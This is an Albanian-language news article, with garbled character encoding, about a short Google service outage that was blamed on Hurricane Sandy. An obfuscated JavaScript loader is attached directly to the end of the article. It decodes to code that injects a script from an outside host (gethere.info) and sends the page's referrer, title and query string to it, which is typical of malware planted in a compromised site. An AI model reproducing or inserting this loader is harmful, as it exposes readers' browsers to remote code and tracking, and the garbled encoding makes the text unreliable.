largea_shfaq1351765210

Gmail shfaq probleme, dyshohet se shkak A�shtA� uragani Sandy

NjA� pjesA� e pA�rdoruesve mbrA�mA� pA�r njA� kohA� tA� shkurtA�r nuk kanA� mundur tA� hyjnA� nA� Gmail, Disk, Reader dhe shumA� shA�rbime tjera tA� Google, kurse probleme tA� njA�jta mund tA� ndodhin edhe gjatA� ditA�ve te ardhshme.

AmerikanA�t po numA�rojnA� dA�met dhe po tentojnA� tA� kthehen nA� gjendje normale pas stuhisA� sA� madhe qA� goditi bregun lindor tA� SHBA-ve. NdA�rkohA� ndikimin e kA�saj stuhie e kanA� ndier edhe pA�rdoruesit e internetit tA� cilA�ve pA�r njA� kohA� tA� shkurtA�r ia��u pamundA�sua kyA�ja nA� shA�rbimet e ndryshme tA� Google-s si Gmail, Google Chat, Disk, Hangout dhe Reader.

Nga kjo situatA�, kompania ka konfirmuar problemet tA� cilat kanA� ndikuar nA� afA�r 10 % tA� pA�rdoruesve dhe ka deklaruar se po punon shumA� pA�r tA� mundA�suar njA� shA�rbim normal tA� Gmail-it dhe shA�rbimeve tjera tA� cilA�t pA�rkohA�sisht ishin tA� padisponueshme, duke vA�nA� nA� dukje se nuk ka pasur asnjA� humbje tA� tA� dhA�nave tA� pA�rdoruesve.

Sipas Google nA� ditA�t nA� vijim mund tA� shfaqen probleme tA� tjera

Problemet me disponueshmA�rinA� zgjatA�n vetA�m pak nA� Google dhe sipas disa informacioneve kjo zgjati vetA�m gjashtA� minuta, kurse nA� disa faqe interneti thuhet se ky problem zgjati mbi dhjetA� minuta. Por edhe kA�ta pak minuta ku u shfaqA�n problemet i shqetA�suan pA�rdoruesit tA� cilA�t menjA�herA� a�?u ankuana�? nA� rrjetet sociale dhe kritikuan Google-n.

Edhe pse nuk ka informacione zyrtare pA�r arsyet pse ka ardhur problemi me qasjen nA� Gmail, Disk dhe shA�rbimet tjera tA� kA�saj kompanie, disa kanA� dyshuar se arsyeja mund tA� jetA� opsioni i ri i Gmail-it pA�r kompozimin dhe pA�rgjigjes sA� e-mail-it.

Por Huffington Post thotA� se shkaku ishte uragani Sandy i cili deri tani ka shkaktuar probleme tA� shumta komunikuese nA� SHBA. NA� kA�tA� faqe thuhet se Google ka paralajmA�ruar pA�rdoruesit pA�r probleme tA� ngjashme dhe mungesa tA� shkurtra tA� qasjes nA�pA�r kA�to shA�rbime qA� mund tA� ndodhin prapA� gjatA� ditA�ve tA� ardhshme, edhe pse po ndA�rmerren tA� gjitha masat qA� kjo mos tA� pA�rsA�ritet.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}